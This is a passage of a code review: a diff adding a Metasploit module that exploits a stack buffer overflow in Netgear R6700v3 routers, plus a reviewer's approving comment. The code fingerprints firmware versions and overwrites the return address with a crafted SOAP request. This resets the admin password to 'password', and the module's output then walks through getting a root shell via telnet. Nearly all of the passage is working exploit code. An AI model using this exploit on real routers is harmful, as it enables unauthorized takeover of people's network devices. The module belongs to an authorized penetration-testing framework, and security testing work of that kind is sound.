modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb

```diff
@@ -0,0 +1,164 @@
+      return "\x58\x9a\x03"
+    elsif res.body.to_s =~ /V1.0.4.82/
+      print_status("#{peer} - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target.")
+      return "\x48\x9a\x03"
+    end
+  end
+
+  def check
+    if get_offset
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+  def run
+    offset = get_offset
+    if not offset
+      fail_with(Failure::Unknown, "Unknown firmware version, can't proceed, please contact the authors")
+    end
+
+    headers =
+    "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceConfig:1#SOAPLogin\nSOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#Whatever"
+
+    payload =
+    "<?xml version=\"1.0\"?>"\
+    "\r\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"\
+    "\r\n<SOAP-ENV:Body>"\
+    "\r\nSetDeviceNameIconByMAC"\
+    "\r\n<NewBlockSiteName>1"
+
+    # filler
+    payload += Rex::Text::rand_text_alpha(1028)
+    # $r4
+    payload += Rex::Text::rand_text_alpha(4)
+    # $r5
+    payload += Rex::Text::rand_text_alpha(4)
+    # $r6
+    payload += Rex::Text::rand_text_alpha(4)
+    # $r7
+    payload += Rex::Text::rand_text_alpha(4)
+    # $r8
+    payload += Rex::Text::rand_text_alpha(4)
+    # $lr (AKA return address)
+    payload += offset
+
+    # trailer
+    payload +=
+    "\r\n</NewBlockSiteName>"\
+    "\r\n</SOAP-ENV:Body>"\
+    "\r\n</SOAP-ENV:Envelope>"
+
+    headers.gsub! "\n", "\r\n"
+    payload.gsub! "\n", "\r\n"
+
+    # MSF adds content len automatically.
+    # Unfortunately this appears before the raw headers hash, but doesn't appear to have ill effects
+    headers += "\r\n"
+
+    res = send_request_cgi({
+      'uri' => '/soap/server_sa',
+      'method'  => 'POST',
+      'raw_headers'  => headers,
+      'data'  => payload
+    })
+
+    if res
+      # no response is received in case of success
+      fail_with(Failure::Unknown, 'Failed to send HTTP payload... try again?')
+    else
+      print_good("#{peer} - HTTP payload sent! 'admin' password has been reset to 'password'")
+      print_status("To achieve code execution, do the following steps manually:")
+      print_status("1- Login to #{rhost} with creds 'admin:password', then:")
+      print_status("\t1.1- go to Advanced -> Administration -> Set Password")
+      print_status("\t1.2- Change the password from 'password' to <WHATEVER>")
+      print_status("2- Run metasploit as root, then:")
+      print_status("\t2.1- use exploit/linux/telnet/netgear_telnetenable")
+      print_status("\t2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>")
+      print_status("\t2.3- set rhost #{rhost}")
+      print_status("\t2.3- set username admin")
+      print_status("\t2.4- set password <WHATEVER>")
+      print_status("\t2.5- run it and login with 'admin:<WHATEVER>'")
+      print_status("3- Enjoy your root shell!")
```

Comment:
Nice documentation! Would like to see this automated if possible but in any case this is still very useful information for the user and I appreciate you including this in here 👍